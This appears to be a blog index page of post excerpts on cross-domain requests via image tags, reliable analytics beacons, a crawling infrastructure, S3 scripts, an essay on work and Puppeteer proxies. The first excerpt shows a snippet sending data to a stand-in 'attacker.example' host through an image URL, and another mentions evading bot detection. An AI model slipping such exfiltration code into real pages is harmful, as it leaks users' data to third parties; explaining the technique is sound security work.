Abusing image tags for cross domain requests

Posted on December 15, 2020 in Security • Tagged with cross-domain-requests, cors, browser • 3 min read

Cross-domain requests made with <img> tags are not bound by the same-origin policy. I will shed light on several ways in which malicious website owners can potentially abuse cross-domain requests made with <img> and <script> tags created with JavaScript.
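To illustrate the basic mechanism: an <img> element created with JavaScript fires a cross-domain GET request the moment its src attribute is set, and the same-origin policy does not block that request from going out. A minimal sketch, assuming a hypothetical attacker-controlled endpoint:

// Setting `src` immediately issues a cross-domain GET request;
// the element does not even need to be attached to the DOM.
const img = new Image();
img.src = 'https://attacker.example/collect?data=' +
  encodeURIComponent('any-value-to-smuggle-out');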


Continue reading

Reliable Cross Domain Requests when the User leaves the Page

Posted on December 10, 2020 in JavaScript • Tagged with navigator.sendBeacon(), visibilitychange, onbeforeunload, cross domain request • 7 min read

In this article, I demonstrate how to reliably send JSON data to a cross-domain server when the user is about to end or interrupt the browsing session by:

  • switching the focus to another page
  • switching from the browser to another application
  • closing the tab
  • closing the browser

or by any other means of terminating or interrupting the current browsing session. Mobile and desktop devices should be supported equally.

Why do I have this very specific requirement?

I am in the process of developing a JavaScript analytics application, and I need to record user interactions on any website and send them to my remote server.

Put differently: I need to record user interactions up until the point where the user leaves the browsing session. The ideal approach for this scenario is to attach an event listener to the visibilitychange event:

document.addEventListener("visibilitychange", function() {
  // visibilityState becomes 'hidden' when the page is no longer
  // visible, for example after a tab switch.
  if (document.visibilityState === 'hidden') {
    localStorage.setItem('triggeredOnPageClose', new Date());
  }
});

This event fires when the current window loses focus and the page visibility becomes hidden, for example when the user switches to another tab.
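Once the page becomes hidden, navigator.sendBeacon() is a natural fit for the actual transport, because the browser delivers the queued request asynchronously even while the page is being unloaded. A minimal sketch, assuming a hypothetical analytics endpoint and payload shape:

document.addEventListener("visibilitychange", function() {
  if (document.visibilityState === 'hidden') {
    const payload = JSON.stringify({ event: 'session-end', ts: Date.now() });
    // A plain string is sent as text/plain, which keeps this a CORS
    // "simple request" to the cross-domain server (no preflight).
    navigator.sendBeacon('https://analytics.example.com/collect', payload);
  }
});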

However, is the above event also triggered when the user closes the page or closes the entire browser? In order …


Continue reading

Crawling Infrastructure - Introduction

Posted on May 18, 2020 in Crawling • Tagged with Crawling, Distributed Computing, Cloud, Web Bots • 6 min read

In this blog article I will introduce my most recent project: a distributed crawling infrastructure that allows crawling any website, either with a low-level HTTP library or with a fully fledged Chrome browser configured to evade bot detection attempts.

This introduction is divided into three distinct blog articles, because a single article would be too long to cover such a huge topic.

  1. (This article) The first part of the series motivates the development of the crawling infrastructure, introduces the architecture of the software and demonstrates how the crawling backend works at a high level.
  2. The second part covers the installation of the distributed crawling infrastructure in the AWS cloud and tests the freshly deployed stack with a test crawl task.
  3. In the third part of this tutorial series, a crawl task with the top 10,000 websites of the world is created. The downloaded HTML documents are stored in S3. For the top 10,000 websites, we use the scientific Tranco list: a research-oriented top sites ranking hardened against manipulation. As a concluding task, we run business logic on the stored HTML files. For example, we extract all URLs from the HTML documents or we run analytics on the <meta> tags …
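As a taste of the business-logic step mentioned in the third part, here is a hedged sketch of extracting all URLs from a stored HTML document, using the cheerio library (the actual implementation in the series may differ):

const cheerio = require('cheerio');

// Takes the raw HTML of a crawled page and returns all anchor URLs.
function extractUrls(html) {
  const $ = cheerio.load(html);
  const urls = [];
  $('a[href]').each((i, el) => urls.push($(el).attr('href')));
  return urls;
}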

Continue reading

Dynamic creation of S3 buckets in many regions

Posted on February 26, 2020 in Scripts • Tagged with AWS, S3, Buckets • 1 min read

A quick script that demonstrates how to create S3 buckets in many regions.
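A hedged sketch of what such a script could look like with the AWS SDK for JavaScript (v3); the region list and bucket-name prefix are hypothetical, and the original script may use a different SDK:

const { S3Client, CreateBucketCommand } = require('@aws-sdk/client-s3');

const regions = ['us-east-1', 'eu-central-1', 'ap-southeast-1'];

async function createBuckets() {
  for (const region of regions) {
    const client = new S3Client({ region });
    const params = { Bucket: `crawl-data-${region}` };
    // Every region except us-east-1 needs an explicit LocationConstraint.
    if (region !== 'us-east-1') {
      params.CreateBucketConfiguration = { LocationConstraint: region };
    }
    await client.send(new CreateBucketCommand(params));
    console.log(`created bucket in ${region}`);
  }
}

createBuckets().catch(console.error);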


Continue reading

The value of work in the coming decades

Posted on February 20, 2020 in Society • Tagged with Digitalization, Society, automation, Second-Machine-Age, Work • 12 min read

This article makes an attempt to understand and predict the consequences of rapid automation and computerization in the realm of human work. I make these predictions based on my experience as a software engineer, while being fully aware that programming is not threatened with eradication by automation in the next decades. For that reason, I realize that I hold a privileged position.

In the second part of the article, I argue why work in general should be voluntary within a welfare state and why the government's main task should be to create a situation where humans don't have to work in order to obtain the bare essentials such as housing, food and healthcare.

What is work?

So what exactly is work? Work is something that sucks, right? After all, if I could spend my time without having to worry about finances, I'd rather spend my days at a tropical beach, drinking beers and doing exactly nothing.

But for how long? When would my natural urge to be productive kick in? I assume that after a couple of days, I would start a project that consumes my time. But since I don't have to worry about its financial …


Continue reading

How to dynamically change http/s proxy servers in puppeteer?

Posted on February 14, 2020 in Scraping • Tagged with Puppeteer, Proxies, Issues, Proxy-Authentication • 5 min read

Find the updated blog post here.

Chrome/Puppeteer has a couple of annoying issues when it comes to using HTTP/S and SOCKS proxies with a Chrome browser controlled by Puppeteer. The most pressing issues are the following:

  1. Dynamically changing proxy servers: Once the Chrome browser is started, the proxy configuration can no longer be changed. A restart is required to switch to a different proxy.
  2. User/pass proxy authentication: The Chrome browser does not support username/password authentication for SOCKS proxies. Puppeteer supports HTTP proxy authentication via the page.authenticate() function (see the sketch after this list), but it has no equivalent for SOCKS proxies.
  3. Per-page proxies: Per-page proxies are not supported by the Chrome browser. The global proxy configuration applies to all pages and windows of a launched Chrome process. It seems like the new module tries to solve this issue.
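To make these limitations concrete, here is a minimal sketch of how a proxy is typically wired up today: the proxy server is fixed at launch time via the --proxy-server flag, and page.authenticate() supplies user/pass credentials for HTTP proxies. The proxy address and credentials are hypothetical placeholders.

const puppeteer = require('puppeteer');

(async () => {
  // The proxy is fixed for the whole browser process at launch time;
  // changing it later requires a full restart (issue 1).
  const browser = await puppeteer.launch({
    args: ['--proxy-server=http://203.0.113.7:3128'],
  });
  const page = await browser.newPage();
  // Works for HTTP proxies, but has no SOCKS equivalent (issue 2).
  await page.authenticate({ username: 'user', password: 'pass' });
  await page.goto('https://ipinfo.io/json');
  console.log(await page.content());
  await browser.close();
})();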

For my purposes, I don't really care about problem 3). I don't need per-page proxies anyway, since the crawling software I write runs with one browser tab at a time. However, issue 1) is a mandatory requirement for me and thus needs to be solved.

The reason is, I don't want to restart the browser …


Continue reading